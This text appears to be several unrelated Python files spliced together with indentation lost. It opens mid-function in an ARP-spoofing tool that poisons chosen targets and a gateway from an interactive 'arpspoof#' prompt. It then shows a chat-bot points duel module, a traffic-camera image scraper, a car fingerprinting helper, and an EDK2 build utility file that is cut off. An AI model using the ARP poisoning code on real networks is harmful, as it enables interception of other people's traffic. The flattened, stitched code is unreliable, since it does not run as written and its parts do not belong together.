# use supplied interface or let scapy choose one
interface = self.__interface or get_working_if()
attacker_MAC = get_if_hwaddr(interface)
print(self.__BOLD + 'Using interface %s (%s)' % (interface, attacker_MAC) + self.__ENDC)
try:
# self.__targets should be a comma-separated string of IP-Adresses
# 10.1.1.2,10.1.1.32,10.1.1.45
# targets is a list of (IP, MAC) tuples
targets = [(t.strip(), self.get_MAC(interface, t.strip())) for t in self.__targets.split(',')]
except Exception, e:
# Exception most likely because get_MAC failed, check if targets or gateway are
# actually valid IP addresses
print(self.__RED + e.message + self.__ENDC)
sys.exit(1)
# same as above, gateway is a (IP, MAC) tuple
try:
# self.__gateway is a single IP address
gateway = (self.__gateway, self.get_MAC(interface, self.__gateway))
except Exception, e:
print(self.__RED + e.message + self.__ENDC)
sys.exit(2)
# create and start the poison thread
poison_thread = threading.Thread(target=self.start_poison_thread, args=(targets, gateway, control_queue, attacker_MAC))
poison_thread.start()
try:
while poison_thread.is_alive():
time.sleep(1) # delay is a quick hack to kind of sync output
# w/o this, the thread output messes up the prompt
# TODO: think of something a little less ugly
command = raw_input('arpspoof# ').split()
if command:
cmd = command[self.CMD].lower()
if cmd in ['help', '?']:
print(self.__BOLD + 'exit: stop poisoning and exit' + self.__ENDC)
elif cmd in ['quit', 'exit', 'stop', 'leave']:
control_queue.put(('quit',))
poison_thread.join()
except KeyboardInterrupt:
# Ctrl+C detected, so let's finish the poison thread and exit
control_queue.put(('quit',))
poison_thread.join()
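# Hedged usage sketch (interface name, target list and gateway IP are
# illustrative; requires scapy and root privileges):
if __name__ == '__main__':
    spoofer = ARPspoof('eth0', '10.1.1.2,10.1.1.32', '10.1.1.1')
    spoofer.runARP()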
duel.py
import logging, coloredlogs
from threading import Thread
from random import randrange
from modules.config import *
from modules.database import Database
from modules.timer import Timer
database = Database(db_host, db_user, db_pass, db_name, db_autocommit)
database.database_connection()
class Duel:
CommandMain = 'duel'
CommandMainOptions = []
CommandResponses = ['accept', 'reject']
DuelCooldown = []
def __init__(self, user, opponent, amount):
self.user = user
self.cooldown_timer = Timer(self.user, DUEL_COOLDOWN, Duel.DuelCooldown, "DuelCooldown")
# opponent = opponent
# amount = int(amount)
self.opponent = opponent
self.amount = amount
def execute_command(self, command):
print("duel started!")
self.start_duel(self.opponent, self.amount)
def execute_command_response(self, response):
if response == Duel.CommandResponses[0]:
print("duel accepted!")
self.get_duel_win()
if response == Duel.CommandResponses[1]:
self.cancel_duel()
def start_duel(self, opponent, amount):
from modules.bot import bot_msg_whsp
if(self.user in Duel.DuelCooldown):
bot_msg_whsp("You can only start a duel every {} mins FailFish".format(int(DUEL_COOLDOWN/60)), self.user)
return ""
if(self.check(opponent, int(amount))):
bot_msg_whsp("{} challenged you to a duel of {} {}! Reply with !accept/!reject in the main chat or wait {} mins for the duel to expire HotPokket".format(self.user, amount, CURRENCY, int(DUEL_EXPIRE/60)), opponent)
bot_msg_whsp("You challenged {} to a duel of {} {}! If they don't respond within {} mins the duel will expire HotPokket".format(opponent, amount, CURRENCY, int(DUEL_EXPIRE/60)), self.user)
# Add duel to the database
database.db_add_duel(self.user, opponent, amount)
# Start cooldown timer thread
Thread(target=self.cooldown_timer.cooldown_run).start()
else:
return ""
def check(self, opponent, amount):
from modules.bot import bot_msg, bot_msg_whsp
if(opponent == NICK):
bot_msg("I always win {} MingLee".format(self.user))
return False
if(opponent == self.user):
return False
if(database.db_check_user_exists(self.user) == False or database.db_check_user_exists(opponent) == False):
return False
if(amount <= 0):
return False
user_points = database.db_get_user_points_int(self.user)
opponent_points = database.db_get_user_points_int(opponent)
if(amount > user_points):
bot_msg_whsp("{}, you don't have {} {} FailFish".format(self.user, amount, CURRENCY), self.user)
return False
if(amount > opponent_points):
bot_msg_whsp("{} doesn't have enough {} to accept this duel. Try a lower amount BabyRage".format(opponent, CURRENCY), self.user)
return False
if(self.check_status(opponent, amount)):
return True
else:
return False
def check_status(self, opponent, amount):
from modules.bot import bot_msg_whsp
if(database.db_check_duel_exists_user(self.user)):
bot_msg_whsp("You are already in an active duel with {}.".format(database.db_get_duel_opponent_from_user(self.user)), self.user)
return False
if(database.db_check_duel_exists_opponent(opponent)):
bot_msg_whsp("{} is already in an active duel.".format(opponent), self.user)
return False
if(database.db_check_duel_exists_opponent(self.user)):
bot_msg_whsp("You must wait for your current duel with {} to finish before doing another.".format(database.db_get_duel_user_from_opponent(self.user)), self.user)
return False
return True
def get_duel_win(self):
from modules.bot import bot_msg, bot_msg_whsp
if(database.db_check_duel_exists_opponent(self.user)):
get_opponent = database.db_get_duel_user_from_opponent(self.user)
win = randrange(0, 2)
points_win = database.db_get_duel_amount(self.user)
if(win == 0):
print('win')
bot_msg("{} won the duel against {} and gets {} {}! FeelsGoodMan KAPOW".format(self.user, get_opponent, points_win, CURRENCY))
database.db_minus_points_user(get_opponent, points_win)
database.db_add_points_user(self.user, points_win)
else:
print('win here')
bot_msg("{} won the duel against {} and gets {} {}! FeelsGoodMan KAPOW".format(get_opponent, self.user, points_win, CURRENCY))
database.db_minus_points_user(self.user, points_win)
database.db_add_points_user(get_opponent, points_win)
database.db_remove_duel(self.user)
def cancel_duel(self):
from modules.bot import bot_msg, bot_msg_whsp
if(database.db_check_duel_exists_opponent(self.user)):
get_opponent = database.db_get_duel_user_from_opponent(self.user)
points_win = database.db_get_duel_amount(self.user)
bot_msg("{} rejected the {} {} duel against {} BabyRage".format(self.user, points_win, CURRENCY, get_opponent))
database.db_remove_duel(self.user)
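# Hedged standalone sketch of the 50/50 settlement performed in get_duel_win,
# using a plain dict in place of the database module (names/amounts illustrative):
if __name__ == '__main__':
    points = {'alice': 100, 'bob': 100}
    wager = 25
    winner, loser = ('alice', 'bob') if randrange(0, 2) == 0 else ('bob', 'alice')
    points[winner] += wager
    points[loser] -= wager
    print("{} wins the duel and gets {} points!".format(winner, wager))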
generate-data.py
import os
import urllib2
import email.utils as eut
import json
import cv2
import process_bgs
from threading import Thread, Lock
from time import sleep
relevantCams = [
#"KA091",
#"KA061",
#"KA041",
#"KA151"
"K11"
]
showPreview = False
printMutex = Lock()
def printLocked(text):
    with printMutex:
        print(text)
def getImageUrl(camera):
return "http://www.svz-bw.de/kamera/ftpdata/" + camera + "/" + camera + "_gross.jpg"
def downloadImage(camera):
url = getImageUrl(camera)
image = {}
image["url"] = url
image["valid"] = False
try:
request = urllib2.Request(url, headers={"Referer" : "https://www.svz-bw.de"})
response = urllib2.urlopen(request)
image["data"] = response.read()
image["time_raw"] = response.info().getheader('Last-Modified')
t = eut.parsedate(image["time_raw"])
image["time"] = t
image["time_str"] = str(t[0]) + "-" + str(t[1]) + "-" + str(t[2]) + "-" + str(t[3]) + "-" + str(t[4]) + "-" + str(t[5])
image["valid"] = True
printLocked("Downloaded image for " + camera)
except:
printLocked("Failed to download image for " + camera)
image["valid"] = False
return image
def createFolder(folder):
if not os.path.exists(folder):
os.makedirs(folder)
def saveImage(container, image):
createFolder("data/" + container["camera"])
f = open("data/" + container["camera"] + "/" + image["time_str"] + ".jpg", "wb")
f.write(image["data"])
f.close()
def processImage(container, image):
saveImage(container, image)
result = container["processor"].processRaw(image["data"], showPreview)
data = {}
data["left"] = result[0]
data["right"] = result[1]
data["time"] = image["time_raw"]
data["verified"] = False
info = json.dumps(data, indent=4)
f = open("data/" + container["camera"] + "/" + image["time_str"] + ".json", "w")
f.write(info)
f.close()
    with printMutex:
        print("Image parsed for " + container["camera"])
        print("\tL: Jam = " + str(result[0]["jam"]) + " Vehicles = " + str(result[0]["vehicles"]))
        print("\tR: Jam = " + str(result[1]["jam"]) + " Vehicles = " + str(result[1]["vehicles"]))
def handleCamera(camera):
container = {}
container["camera"] = camera
container["last"] = None
container["valid"] = None
container["processor"] = process_bgs.ImageProcessor(camera)
while(True):
printLocked("Downloading image for " + camera)
image = downloadImage(camera)
if image["valid"] == True:
if(container["valid"] is None or container["valid"]["time_str"] != image["time_str"]):
processImage(container, image) # Only process if it's a new image
container["valid"] = image
container["last"] = image
#sleep(60)
cv2.waitKey(60 * 1000)
def main():
threads = []
for cam in relevantCams:
thread = Thread(target = handleCamera, args = (cam, ))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == '__main__':
    main()
car_helpers.py
import os
import threading
import requests
from common.params import Params, put_nonblocking
from common.basedir import BASEDIR
#from selfdrive.version import is_comma_remote, is_tested_branch
from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_legacy_fingerprint_cars
from selfdrive.car.vin import get_vin, VIN_UNKNOWN
from selfdrive.car.fw_versions import get_fw_versions, match_fw_to_car
from selfdrive.swaglog import cloudlog
import cereal.messaging as messaging
from selfdrive.car import gen_empty_fingerprint
import selfdrive.sentry as sentry
from cereal import car
EventName = car.CarEvent.EventName
def get_startup_event(car_recognized, controller_available, fw_seen):
if True: #is_comma_remote() and is_tested_branch():
event = EventName.startup
else:
event = EventName.startupMaster
if not car_recognized:
if fw_seen:
event = EventName.startupNoCar
else:
event = EventName.startupNoFw
elif car_recognized and not controller_available:
event = EventName.startupNoControl
return event
def get_one_can(logcan):
while True:
can = messaging.recv_one_retry(logcan)
if len(can.can) > 0:
return can
def load_interfaces(brand_names):
ret = {}
for brand_name in brand_names:
path = f'selfdrive.car.{brand_name}'
CarInterface = __import__(path + '.interface', fromlist=['CarInterface']).CarInterface
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carstate.py'):
CarState = __import__(path + '.carstate', fromlist=['CarState']).CarState
else:
CarState = None
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carcontroller.py'):
CarController = __import__(path + '.carcontroller', fromlist=['CarController']).CarController
else:
CarController = None
for model_name in brand_names[brand_name]:
ret[model_name] = (CarInterface, CarController, CarState)
return ret
def _get_interface_names():
    # read all the folders in selfdrive/car and return a dict where:
    # - keys are all the car brands we have an interface for
    # - values are lists of specific car models for a given brand
brand_names = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
try:
brand_name = car_folder.split('/')[-1]
model_names = __import__(f'selfdrive.car.{brand_name}.values', fromlist=['CAR']).CAR
model_names = [getattr(model_names, c) for c in model_names.__dict__.keys() if not c.startswith("__")]
brand_names[brand_name] = model_names
except (ImportError, OSError):
pass
return brand_names
# imports from directory selfdrive/car/<name>/
interface_names = _get_interface_names()
interfaces = load_interfaces(interface_names)
# **** for use live only ****
def fingerprint(logcan, sendcan):
fixed_fingerprint = os.environ.get('FINGERPRINT', "")
skip_fw_query = os.environ.get('SKIP_FW_QUERY', False)
dp_car_assigned = Params().get('dp_car_assigned', encoding='utf8')
if dp_car_assigned is not None:
car_selected = dp_car_assigned.strip()
fixed_fingerprint = car_selected
skip_fw_query = True
if not fixed_fingerprint and not skip_fw_query:
        # VIN query only reliably works through OBD-II
bus = 1
cached_params = Params().get("CarParamsCache")
if cached_params is not None:
cached_params = car.CarParams.from_bytes(cached_params)
if cached_params.carName == "mock":
cached_params = None
        if cached_params is not None and len(cached_params.carFw) > 0 and cached_params.carVin != VIN_UNKNOWN:
cloudlog.warning("Using cached CarParams")
vin = cached_params.carVin
car_fw = list(cached_params.carFw)
else:
cloudlog.warning("Getting VIN & FW versions")
_, vin = get_vin(logcan, sendcan, bus)
car_fw = get_fw_versions(logcan, sendcan, bus)
exact_fw_match, fw_candidates = match_fw_to_car(car_fw)
else:
vin = VIN_UNKNOWN
exact_fw_match, fw_candidates, car_fw = True, set(), []
cloudlog.warning("VIN %s", vin)
Params().put("CarVin", vin)
finger = gen_empty_fingerprint()
candidate_cars = {i: all_legacy_fingerprint_cars() for i in [0, 1]} # attempt fingerprint on both bus 0 and 1
frame = 0
frame_fingerprint = 10 # 0.1s
car_fingerprint = None
done = False
while not done:
a = get_one_can(logcan)
for can in a.can:
# The fingerprint dict is generated for all buses, this way the car interface
# can use it to detect a (valid) multipanda setup and initialize accordingly
if can.src < 128:
if can.src not in finger:
finger[can.src] = {}
finger[can.src][can.address] = len(can.dat)
for b in candidate_cars:
# Ignore extended messages and VIN query response.
if can.src == b and can.address < 0x800 and can.address not in (0x7df, 0x7e0, 0x7e8):
candidate_cars[b] = eliminate_incompatible_cars(can, candidate_cars[b])
# if we only have one car choice and the time since we got our first
# message has elapsed, exit
for b in candidate_cars:
if len(candidate_cars[b]) == 1 and frame > frame_fingerprint:
# fingerprint done
car_fingerprint = candidate_cars[b][0]
# bail if no cars left or we've been waiting for more than 2s
failed = (all(len(cc) == 0 for cc in candidate_cars.values()) and frame > frame_fingerprint) or frame > 200
succeeded = car_fingerprint is not None
done = failed or succeeded
frame += 1
exact_match = True
source = car.CarParams.FingerprintSource.can
# If FW query returns exactly 1 candidate, use it
if len(fw_candidates) == 1:
car_fingerprint = list(fw_candidates)[0]
source = car.CarParams.FingerprintSource.fw
exact_match = exact_fw_match
if fixed_fingerprint:
car_fingerprint = fixed_fingerprint
source = car.CarParams.FingerprintSource.fixed
cloudlog.event("fingerprinted", car_fingerprint=car_fingerprint,
source=source, fuzzy=not exact_match, fw_count=len(car_fw))
return car_fingerprint, finger, vin, car_fw, source, exact_match
def is_connected_to_internet(timeout=5):
try:
requests.get("https://sentry.io", timeout=timeout)
return True
except Exception:
return False
def crash_log(candidate):
while True:
if is_connected_to_internet():
sentry.capture_warning("fingerprinted %s" % candidate)
break
def crash_log2(fingerprints, fw):
while True:
if is_connected_to_internet():
sentry.capture_warning("car doesn't match any fingerprints: %s" % fingerprints)
sentry.capture_warning("car doesn't match any fw: %s" % fw)
break
def get_car(logcan, sendcan):
candidate, fingerprints, vin, car_fw, source, exact_match = fingerprint(logcan, sendcan)
if candidate is None:
cloudlog.warning("car doesn't match any fingerprints: %r", fingerprints)
candidate = "mock"
y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,))
y.start()
x = threading.Thread(target=crash_log, args=(candidate,))
x.start()
try:
CarInterface, CarController, CarState = interfaces[candidate]
car_params = CarInterface.get_params(candidate, fingerprints, car_fw)
car_params.carVin = vin
car_params.carFw = car_fw
car_params.fingerprintSource = source
car_params.fuzzyFingerprint = not exact_match
# dp - handle sr learner memory/reset feature
params = Params()
candidate_changed = params.get('dp_last_candidate', encoding='utf8') != candidate
# keep stock sr
put_nonblocking("dp_sr_stock", str(car_params.steerRatio))
dp_sr_custom = params.get("dp_sr_custom", encoding='utf8')
# reset default sr
if dp_sr_custom == '' or candidate_changed or (dp_sr_custom != '' and float(dp_sr_custom) <= 9.99):
put_nonblocking("dp_sr_custom", str(car_params.steerRatio))
# update last candidate
put_nonblocking('dp_last_candidate', candidate)
return CarInterface(car_params, CarController, CarState), car_params
except KeyError:
put_nonblocking("dp_last_candidate", '')
put_nonblocking("dp_car_assigned", '')
put_nonblocking("dp_sr_custom", '9.99')
put_nonblocking("dp_sr_stock", '9.99')
return None, None
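# Hedged illustration of the __import__(..., fromlist=[...]) pattern that
# load_interfaces relies on, shown with a stdlib module so the mechanics are clear:
if __name__ == '__main__':
    decoder_cls = __import__('json.decoder', fromlist=['JSONDecoder']).JSONDecoder
    print(decoder_cls)  # -> <class 'json.decoder.JSONDecoder'>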
Misc.py
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
from random import sample
from struct import pack
import uuid
import subprocess
from collections import OrderedDict
import Common.LongFilePathOs as os
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from Common.DataType import *
from Common.BuildToolError import *
from CommonDataClass.DataClass import *
from Common.Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile(r"\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile(r"^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile(r"^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile(r'^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile(r'^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile(r'^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
                m = re.match(r'^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
        # state machine transition
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
        elif status == 2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = valuePatternGcc.match(line)
if m is not None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m is not None:
m = re.match(".data.(%s)$" % varname, line)
if m is not None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = pcdPatternGcc.match(Str.strip())
if m is not None:
varoffset.append((varname, int(m.groups(0)[0], 16), int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if startPatternGeneral.match(line):
status = 1
continue
if addressPatternGeneral.match(line):
status = 2
continue
if line.startswith("entry point at"):
status = 3
continue
if status == 1 and len(line) != 0:
m = secReGeneral.match(line)
assert m is not None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m is not None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
# cannot pregenerate this RegEx since it uses varname from varnames.
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 is not None:
                # found a binary PCD entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs is None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
    # A temporary INF is copied to the database path, which must have write permission.
    # The temporary file will be removed at the end of the build.
    # In case of a name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
    # To build the same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1, open(TempFullPath, 'rb') as f2:
if f1.read() == f2.read():
return RtPath
_TempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporarily created INFs whose paths were saved in _TempInfs
#
def ClearDuplicatedInf():
while _TempInfs:
File = _TempInfs.pop()
if os.path.exists(File):
os.remove(File)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
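# A quick sanity example (the GUID below is arbitrary):
#   GuidStringToGuidStructureString('0D1B936F-68F3-4589-AFCC-FB8B7AEBC836')
#   # -> '{0x0D1B936F, 0x68F3, 0x4589, {0xAF, 0xCC, 0xFB, 0x8B, 0x7A, 0xEB, 0xC8, 0x36}}'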
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
#  This method saves a file only when its content has changed, which is
#  quite useful for the "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if os.path.exists(File):
if IsBinaryFile:
try:
with open(File, "rb") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
else:
try:
with open(File, "r") as f:
if Content == f.read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
if IsBinaryFile:
try:
with open(File, "wb") as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
else:
try:
with open(File, 'w') as Fd:
Fd.write(Content)
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
return True
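# Typical usage sketch: only rewrite generated files whose content differs, so
# make-style incremental builds see stable timestamps:
#   if SaveFileOnChange(OutputFile, NewContent, IsBinaryFile=False):
#       pass    # file was renewed; dependent targets will be re-built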
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
